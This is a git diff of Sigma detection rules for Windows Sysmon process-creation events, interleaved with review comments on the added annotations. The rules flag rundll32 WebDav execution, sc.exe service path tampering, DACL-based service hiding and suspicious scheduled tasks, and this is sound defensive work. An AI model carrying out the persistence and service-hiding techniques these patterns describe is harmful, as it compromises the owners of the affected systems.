@@ -19,20 +18,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_call_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_call_parent: ParentImage|endswith: \cmd.exe selection_call_cli: - CommandLine|contains: user32.dll, + CommandLine|contains: user32.dll, selection_function: - CommandLine|contains: LockWorkStation + CommandLine|contains: LockWorkStation condition: process_creation and (all of selection_*) fields: - Image - ParentImage falsepositives: - - Scripts or links on the user desktop used to lock the workstation instead of - Windows+L or the menu option + - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml index 8829de915..f847ab950 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml 
@@ -1,13 +1,9 @@ title: WebDav Client Execution Via Rundll32.EXE id: 2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5 status: test -description: 'Detects "svchost.exe" spawning "rundll32.exe" with command arguments - like "C:\windows\system32\davclnt.dll,DavSetCookie". - - This could be an indicator of exfiltration or use of WebDav to launch code (hosted - on a WebDav server). - - ' +description: | + Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". + This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). references: - https://github.com/OTRF/detection-hackathon-apt29/issues/17 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md @@ -28,10 +24,10 @@ detection: selection_parent: ParentImage|endswith: \svchost.exe selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie + CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml index 843fd2bb7..de81ecdc3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml 
@@ -1,12 +1,8 @@ title: Suspicious WebDav Client Execution Via Rundll32.EXE id: 982e9f2d-1a85-4d5b-aea4-31f5e97c6555 status: experimental -description: 'Detects "svchost.exe" spawning "rundll32.exe" with command arguments - like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator - of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially - a sign of exploitation of CVE-2023-23397 - - ' +description: | + Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 references: - https://twitter.com/aceresponder/status/1636116096506818562 - https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ @@ -32,13 +28,13 @@ detection: ParentImage|endswith: \svchost.exe ParentCommandLine|contains: -s WebClient Image|endswith: \rundll32.exe - CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie - CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} + CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie + CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} filter_local_ips: - CommandLine|contains: - - ://10. - - ://192.168. - - ://172.16. + CommandLine|contains: + - ://10. # 10.0.0.0/8 + - ://192.168. # 192.168.0.0/16 + - ://172.16. # 172.16.0.0/12 - ://172.17. - ://172.18. - ://172.19. @@ -54,8 +50,8 @@ detection: - ://172.29. - ://172.30. - ://172.31. - - ://127. - - ://169.254. + - ://127. # 127.0.0.0/8 + - ://169.254. # 169.254.0.0/16 condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown 
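Review bot: In the `@@ -32,13 +28,13 @@` hunk the comment `# 172.16.0.0/12` is attached only to the `- ://172.16.` entry of filter_local_ips, while the /12 block is what the sixteen entries `://172.16.` through `://172.31.` together exclude; as written it reads as if 172.16. alone were the /12 and the following fifteen prefixes were separate, uncommented ranges. Suggest rewording it to cover the run, e.g. `- ://172.16. # 172.16.0.0/12, i.e. 172.16. through 172.31.`, or moving it to a comment line above the first 172.x entry. The other new comments (`10.0.0.0/8`, `192.168.0.0/16`, `127.0.0.0/8`, `169.254.0.0/16`) match their prefixes correctly.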
diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_without_parameters.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_without_parameters.yml index 4dc27c7fa..3824f784f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_without_parameters.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_without_parameters.yml @@ -1,8 +1,7 @@ title: Rundll32 Execution Without Parameters id: 5bb68627-3198-40ca-b458-49f973db8752 status: test -description: Detects rundll32 execution without parameters as observed when running - Metasploit windows/smb/psexec exploit module +description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module references: - https://bczyz1.github.io/2021/01/30/psexec.html author: Bartlomiej Czyz, Relativity @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine: + CommandLine: - rundll32.exe - rundll32 condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_runonce_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_runonce_execution.yml index bda329fbb..454a7cab6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_runonce_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_runonce_execution.yml @@ -1,8 +1,7 @@ title: Run Once Task Execution as Configured in Registry id: 198effb6-6c98-4d0c-9ea3-451fa143c45c status: test -description: This rule detects the execution of Run Once task as configured in the - registry +description: This rule detects the execution of Run Once task as configured in the registry references: - https://twitter.com/pabraeken/status/990717080805789697 - https://lolbas-project.github.io/lolbas/Binaries/Runonce/ 
@@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \runonce.exe - - Description: Run Once Wrapper + - Image|endswith: \runonce.exe + - Description: Run Once Wrapper selection_cli: - - CommandLine|contains: /AlternateShellStartup - - CommandLine|endswith: /r + - CommandLine|contains: /AlternateShellStartup + - CommandLine|endswith: /r condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml index 23318908c..89d9113c9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml @@ -1,8 +1,7 @@ title: Possible Privilege Escalation via Weak Service Permissions id: d937b75f-a665-4480-88a5-2f20e9f9b22a status: test -description: Detection of sc.exe utility spawning by user with Medium integrity level - to change service ImagePath or FailureCommand +description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://pentestlab.blog/2017/03/30/weak-service-permissions/ @@ -26,11 +25,11 @@ detection: Image|endswith: \sc.exe IntegrityLevel: Medium selection_binpath: - CommandLine|contains|all: + CommandLine|contains|all: - config - binPath selection_failure: - CommandLine|contains|all: + CommandLine|contains|all: - failure - command condition: process_creation and (scbynonadmin and 1 of selection_*) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_create_service.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_create_service.yml index 3cc3c0d0d..07169583e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_create_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_create_service.yml @@ -1,8 +1,8 @@ title: New Service Creation Using Sc.EXE id: 85ff530b-261d-48c6-a441-facaa2e81e48 related: - - id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 - type: similar + - id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 # Using PowerShell + type: similar status: test description: Detects the creation of a new service using the "sc.exe" utility. references: @@ -23,7 +23,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \sc.exe - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_disable_service.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_disable_service.yml index a228f10a7..5b5ed0407 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_disable_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_disable_service.yml @@ -1,8 +1,7 @@ title: Service StartupType Change Via Sc.EXE id: 85c312b7-f44d-4a51-a024-d671c40b49fc status: test -description: Detect the use of "sc.exe" to change the startup type of a service to - "disabled" or "demand" +description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -21,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' config ' - start - CommandLine|contains: + CommandLine|contains: - disabled - demand condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_new_kernel_driver.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_new_kernel_driver.yml index ddc55e6ba..df4f4d0ca 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_new_kernel_driver.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_new_kernel_driver.yml @@ -21,10 +21,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \sc.exe - CommandLine|contains: + CommandLine|contains: - create - config - CommandLine|contains|all: + CommandLine|contains|all: - binPath - type - kernel diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_query.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_query.yml index d97214d56..085c20532 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_query.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_query.yml @@ -1,8 +1,7 @@ title: SC.EXE Query Execution id: 57712d7a-679c-4a41-a913-87e7175ae429 status: test -description: Detects execution of "sc.exe" to query information about registered services - on the system +description: Detects execution of "sc.exe" to query information about registered services on the system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery author: frack113 
@@ -23,12 +22,10 @@ detection: Image|endswith: \sc.exe OriginalFileName|endswith: sc.exe selection_cli: - CommandLine|contains: ' query' + CommandLine|contains: ' query' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate query of a service by an administrator to get more information such - as the state or PID - - Keybase process "kbfsdokan.exe" query the dokan1 service with the following - commandline "sc query dokan1" + - Legitimate query of a service by an administrator to get more information such as the state or PID + - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query dokan1" level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml index faa5b1954..2f5d4162e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml @@ -1,12 +1,10 @@ title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE id: 6c8fbee5-dee8-49bc-851d-c3142d02aa47 related: - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Generic SD tampering + type: similar status: test -description: Detects suspicious DACL modifications to allow access to a service from - a suspicious trustee. This can be used to override access restrictions set by - previous ACLs. +description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. references: - https://twitter.com/0gtweet/status/1628720819537936386 - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ 
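Review bot: The new comment `# Generic SD tampering` on the related id a537cfc3-4297-4789-92b5-345bfd845ad0 in the Allow Service Access rule labels the wrong rule: elsewhere in this commit that id is "Service DACL Abuse To Hide Services Via Sc.EXE", and the deny rule labels the same id `# Specific Technique` while reserving `# Generic SD tampering` for 98c5aeef-32d5-492f-b174-64a691896d25 ("Service Security Descriptor Tampering Via Sc.EXE"). Change the comment to `- id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique` to match the sibling rules. Since the deny rule also lists the generic tampering rule as `similar`, the allow rule would presumably benefit from the same related entry, but that is a content decision for the rule author.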
@@ -25,19 +23,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sc: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_sdset: - CommandLine|contains|all: + CommandLine|contains|all: - sdset - - A; + - A; # Allow Access selection_trustee: - CommandLine|contains: - - ;IU - - ;SU - - ;BA - - ;SY - - ;WD + CommandLine|contains: + - ;IU # Interactively logged-on user + - ;SU # Service logon user + - ;BA # Built-in administrators + - ;SY # Local system + - ;WD # Everyone condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml index 870e75c63..d54b5fc41 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml 
@@ -1,13 +1,12 @@ title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 related: - - id: 98c5aeef-32d5-492f-b174-64a691896d25 - type: similar - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering + type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique + type: similar status: test -description: Detects suspicious DACL modifications to deny access to a service that - affects critical trustees. This can be used to hide services or make them unstoppable. +description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. references: - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ @@ -27,19 +26,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sc: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_sdset: - CommandLine|contains|all: + CommandLine|contains|all: - sdset - - D; + - D; # Deny Access selection_trustee: - CommandLine|contains: - - ;IU - - ;SU - - ;BA - - ;SY - - ;WD + CommandLine|contains: + - ;IU # Interactively logged-on user + - ;SU # Service logon user + - ;BA # Built-in administrators + - ;SY # Local system + - ;WD # Everyone condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml index 06a6db993..3357fff9e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml @@ -1,13 +1,12 @@ title: Service DACL Abuse To Hide Services Via Sc.EXE id: a537cfc3-4297-4789-92b5-345bfd845ad0 related: - - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 - type: similar - - id: 98c5aeef-32d5-492f-b174-64a691896d25 - type: similar + - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access + type: similar + - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering + type: similar status: test -description: Detects usage of the "sc.exe" utility adding a new service with special - permission seen used by threat actors which makes the service hidden and unremovable. +description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. references: - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ @@ -30,11 +29,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - sdset + # Summary of permissions + # DC: Delete All Child Objects + # LC: List Contents + # WP: Write All Properties + # DT: Delete Subtree + # SD: Delete - DCLCWPDTSD condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_modification.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_modification.yml index 4b743ff7f..b9e32768d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_modification.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_modification.yml 
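Review bot: The "Summary of permissions" comment added above `- DCLCWPDTSD` gives the directory-object readings of those SDDL tokens (Delete All Child Objects, List Contents, Write All Properties, Delete Subtree), which is not what they mean on a service security descriptor. For a service, the same access-right bits correspond to SERVICE_CHANGE_CONFIG (DC), SERVICE_QUERY_STATUS (LC), SERVICE_STOP (WP), SERVICE_PAUSE_CONTINUE (DT) and DELETE (SD); denying query-status is what makes the service disappear from enumeration and denying stop/delete is what makes it unremovable, which is the behaviour the description refers to. I would reword the comment to the service-rights meanings, e.g. `# DC: SERVICE_CHANGE_CONFIG`, `# LC: SERVICE_QUERY_STATUS`, `# WP: SERVICE_STOP`, `# DT: SERVICE_PAUSE_CONTINUE`, `# SD: DELETE`, so an analyst reading the alert understands why this exact string matters.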
@@ -1,13 +1,12 @@ title: Service Security Descriptor Tampering Via Sc.EXE id: 98c5aeef-32d5-492f-b174-64a691896d25 related: - - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 - type: similar - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access + type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique + type: similar status: test -description: Detection of sc.exe utility adding a new service with special permission - which hides that service. +description: Detection of sc.exe utility adding a new service with special permission which hides that service. references: - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ @@ -30,10 +29,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains: sdset + CommandLine|contains: sdset condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_service_path_modification.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_service_path_modification.yml index cd7155f26..dd65e0d16 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_service_path_modification.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_service_path_modification.yml 
@@ -1,8 +1,7 @@ title: Suspicious Service Path Modification id: 138d3531-8793-4f50-a2cd-f291b2863d78 status: test -description: Detects service path modification via the "sc" binary to a suspicious - command or path +description: Detects service path modification via the "sc" binary to a suspicious command or path references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html @@ -23,10 +22,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \sc.exe - CommandLine|contains|all: + CommandLine|contains|all: - config - binPath - CommandLine|contains: + CommandLine|contains: + # Add more suspicious commands or binaries - powershell - 'cmd ' - mshta @@ -41,6 +41,7 @@ detection: - cmd /c - cmd /k - cmd /r + # Add more suspicious paths - C:\Users\Public - \Downloads\ - \Desktop\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml index a3c07991f..96e734150 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml 
@@ -1,9 +1,7 @@ title: Potential Persistence Attempt Via Existing Service Tampering id: 38879043-7e1e-47a9-8d46-6bec88e201df status: test -description: Detects the modification of an existing service in order to execute an - arbitrary payload when the service is started or killed as a potential method - for persistence. +description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. references: - https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/ author: Sreeman @@ -22,25 +20,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sc: - - CommandLine|contains|all: - - 'sc ' - - 'config ' - - binpath= - - CommandLine|contains|all: - - 'sc ' - - failure - - command= + - CommandLine|contains|all: + - 'sc ' + - 'config ' + - binpath= + - CommandLine|contains|all: + - 'sc ' + - failure + - command= selection_reg_img: - - CommandLine|contains|all: - - 'reg ' - - 'add ' - - FailureCommand - - CommandLine|contains|all: - - 'reg ' - - 'add ' - - ImagePath + - CommandLine|contains|all: + - 'reg ' + - 'add ' + - FailureCommand + - CommandLine|contains|all: + - 'reg ' + - 'add ' + - ImagePath selection_reg_ext: - CommandLine|contains: + CommandLine|contains: - .sh - .exe - .dll diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_stop_service.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_stop_service.yml index 4755908cf..afcdf3c4e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_stop_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_stop_service.yml 
@@ -1,8 +1,8 @@ title: Stop Windows Service Via Sc.EXE id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1 related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: obsoletes status: test description: Detects the stopping of a Windows service author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -19,20 +19,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: sc.exe - - Image|endswith: \sc.exe + - OriginalFileName: sc.exe + - Image|endswith: \sc.exe selection_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' filter_kaspersky: - CommandLine: - - sc stop KSCWebConsoleMessageQueue - - sc stop LGHUBUpdaterService - User|contains: + CommandLine: + - sc stop KSCWebConsoleMessageQueue # kaspersky Security Center Web Console double space between sc and stop + - sc stop LGHUBUpdaterService # Logitech LGHUB Updater Service + User|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - There are many legitimate reasons to stop a service. This rule isn't looking - for any suspicious behaviour in particular. Filter legitimate activity accordingly + - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_appdata_local_system.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_appdata_local_system.yml index 0acc4c6ac..e23e2bddc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_appdata_local_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_appdata_local_system.yml 
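Review bot: The new comment `# kaspersky Security Center Web Console double space between sc and stop` documents that the exact-match value `sc stop KSCWebConsoleMessageQueue` under filter_kaspersky depends on two spaces, but the value is an unquoted plain scalar, so the significant whitespace is invisible and easy to lose in a re-serialisation like the one this commit performs. Quote the value so the double space is explicit: `- 'sc  stop KSCWebConsoleMessageQueue' # Kaspersky Security Center Web Console (note the double space)`. A filter that silently stops matching after a whitespace change is harmless for detection coverage but would resurface the false positive it was added to suppress, so it is worth making the intent self-evident; the Logitech entry in the same list does not belong under a name like filter_kaspersky, but that is pre-existing.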
@@ -22,21 +22,22 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - /Create - /RU - /TR - C:\Users\ - \AppData\Local\ - CommandLine|contains: - - NT AUT - - ' SYSTEM ' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space filter: + # FP from test set in SIGMA ParentImage|contains|all: - \AppData\Local\Temp\ - TeamViewer_.exe Image|endswith: \schtasks.exe - CommandLine|contains: /TN TVInstallRestore + CommandLine|contains: /TN TVInstallRestore condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_change.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_change.yml index 15796dc0e..5faaee6d7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_change.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_change.yml 
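Review bot: The new comment on the `' SYSTEM '` entry reads `hence it gets it's own value with space`; "it's" should be "its". The `# FP from test set in SIGMA` comment placed on the filter would be more useful if it named what the filter excludes, e.g. `# FP: TeamViewer installer (TeamViewer_.exe in %LOCALAPPDATA%\Temp) creating the TVInstallRestore task`, since the filter is keyed on a parent image under a user-writable Temp folder and a reviewer tuning it later needs to know what legitimate activity it covers.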
@@ -1,18 +1,13 @@ title: Suspicious Modification Of Scheduled Tasks id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b related: - - id: 614cf376-6651-47c4-9dcc-6b9527f749f4 - type: similar + - id: 614cf376-6651-47c4-9dcc-6b9527f749f4 # Security-Audting Eventlog + type: similar status: test -description: 'Detects when an attacker tries to modify an already existing scheduled - tasks to run from a suspicious location - - Attackers can create a simple looking task in order to avoid detection on creation - as it''s often the most focused on - +description: | + Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location + Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on Instead they modify the task after creation to include their malicious payload - - ' references: - Internal Research - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks @@ -32,11 +27,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_schtasks: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' /Change ' - ' /TN ' selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp - \AppData\Roaming\ - \Users\Public\ @@ -51,7 +46,7 @@ detection: - '%comspec%' - '%localappdata%' selection_susp_images: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - 'cmd /c ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation.yml index 591ae494f..d4c6442d4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation.yml 
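Review bot: The new comment `# Security-Audting Eventlog` on the related id 614cf376-6651-47c4-9dcc-6b9527f749f4 misspells "Auditing"; the same misspelled comment is added on 7595ba94-cf3b-4471-aa03-4f6baa9e5fad in the Delete Important Scheduled Task and Disable Important Scheduled Task hunks later in this patch. Correct it in all three to `# Security-Auditing Eventlog`. While the description is being reflowed into a block scalar, "modify an already existing scheduled tasks" should read "an already existing scheduled task".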
@@ -23,9 +23,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \schtasks.exe - CommandLine|contains: ' /create ' + CommandLine|contains: ' /create ' filter: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml index c305cd804..a211872cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml @@ -1,8 +1,7 @@ title: Suspicious Scheduled Task Creation Involving Temp Folder id: 39019a4e-317f-4ce3-ae63-309a8c6b53c5 status: test -description: Detects the creation of scheduled tasks that involves a temporary folder - and runs only once +description: Detects the creation of scheduled tasks that involves a temporary folder 